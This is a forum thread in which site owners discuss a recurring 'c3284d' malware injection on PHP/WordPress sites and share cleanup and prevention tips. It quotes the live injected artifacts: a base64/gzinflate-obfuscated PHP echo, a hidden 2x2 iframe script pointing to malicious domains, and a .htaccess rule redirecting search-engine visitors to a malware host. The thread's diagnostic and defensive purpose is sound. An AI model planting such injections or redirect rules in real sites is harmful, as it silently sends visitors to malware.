All geek questions in one place

Site iframe attack - embed code in source code

Over the past few days, my site has repeatedly been the subject of an iframe attack. The code is added mainly to PHP and Javascript pages. Then the code is encoded by PHP base 64, see Example (I changed the code a bit to neutralize it):

#c3284d# echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8 VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L"))); #/c3284d#

This decoded one looks something like this:

 <script type="text/javascript"> document.write( '<iframe src="http://opticmoxie.com/xxxxxxx.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>' );

The only thing that is common is that all the code has the comment "# c3284d #", so tracking malicious code is not difficult. But it takes a lot of time ...

We are located on a shared server in Gradwell (UK) and they were not particularly helpful. So the question is, what can I do to prevent this problem from recurring? I know MySQL Injection attacks and use PHP mysql_real_escape_string to protect against such attacks.

The site is PHP and MySQL. We use MySQLFTP and have a shell account to access SSH. We use Wordpress (latest update with plugins disabled).

+6
source share
8 answers

I had the same problem. FTP server access logs showed that the changes were made using a hacked FTP password.

+1
source

I have the same problem and variants of different hacked files on different domains. The only thing I notice is Wordpress. We have wordpress on many of these servers, and I think this is a common criminal. I updated all my Wordpress accounts, changed all the words for all the domain accounts. not sure if the problem is completely resolved.

+1
source

I had the same problem but on a Wordpress site.

I assume that the site was infected through widgets, because I use one plugin that allows you to execute PHP code.

My best solution was:

  • eliminate a suspicious widget;
  • see the time and date of one infected file (my case: header.php);
  • clean all infected files (in my case, I have a backup copy of the site);
  • search in the log file for suspicious IP addresses at this time (search for found IP addresses in blacklists);
  • install one plugin to ban suspicious IP addresses.

From that moment, the problem disappeared. Hope this helps you.

+1
source

Had the same problem on all Wordpress sites that I administer. I didn’t find the source of the infection, I’m sure that it is a worm on my computer or some kind of plug-in that I installed on all sites.

I found all the files that were changed in the logs of the WP-Better security plug-ins and deleted additional infected code, and after I made chmod 444 on all the files that were the source of the infection.

Now I am free from 1 month of evil frames / htacess and other things.

+1
source

I had the same problem and found that the method they used was a hacked ftp password.

Despite the fact that it works on the cPanel server with CPHulk enforcement protection turned on, I found that hackers tried to go too far through thousands of different compromised hosts.

Fortunately, I had a log of all the files that were downloaded, so I wrote a script to restore these files from backups.

Then I increased the cPanel brute force protection levels, reducing the number of unsuccessful attempts required before account lockout.

+1
source

I recommend you take a look at this:
http://websiteprotection.blogspot.pt/2009/10/measures-to-prevent-and-detect-iframe.html
It also has a script to clear it.

+1
source

I have the same problem too. In my case, the added code

 <!--c3284d--><script type="text/javascript"> document.write('<iframe src="http://poseyhumane.org/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); </script><!--/c3284d-->

In addition, there is a .htaccess file as shown below:

 > #c3284d# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} > ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) > RewriteRule ^(.*)$ http://onestopchinasource.com/catalog/stats.php > [R=301,L] </IfModule> > #/c3284d#

I found two articles about this problem: http://www.webmasterworld.com/html/4472821.htm and http://stopmalvertising.com/malware-reports/the-c3284d-malware-network-stats.php.html

Hope this helps

0
source

bad guys have access to your code, so you need to close their access, in the meantime you can use a simple script that checks and deletes all the lines where it detects gzinflate (base64_decode, but even the best code (checksum) checker with backup files ) will be useless if they still have access

-1
source

Source: https://habr.com/ru/post/920190/

More articles:


All Articles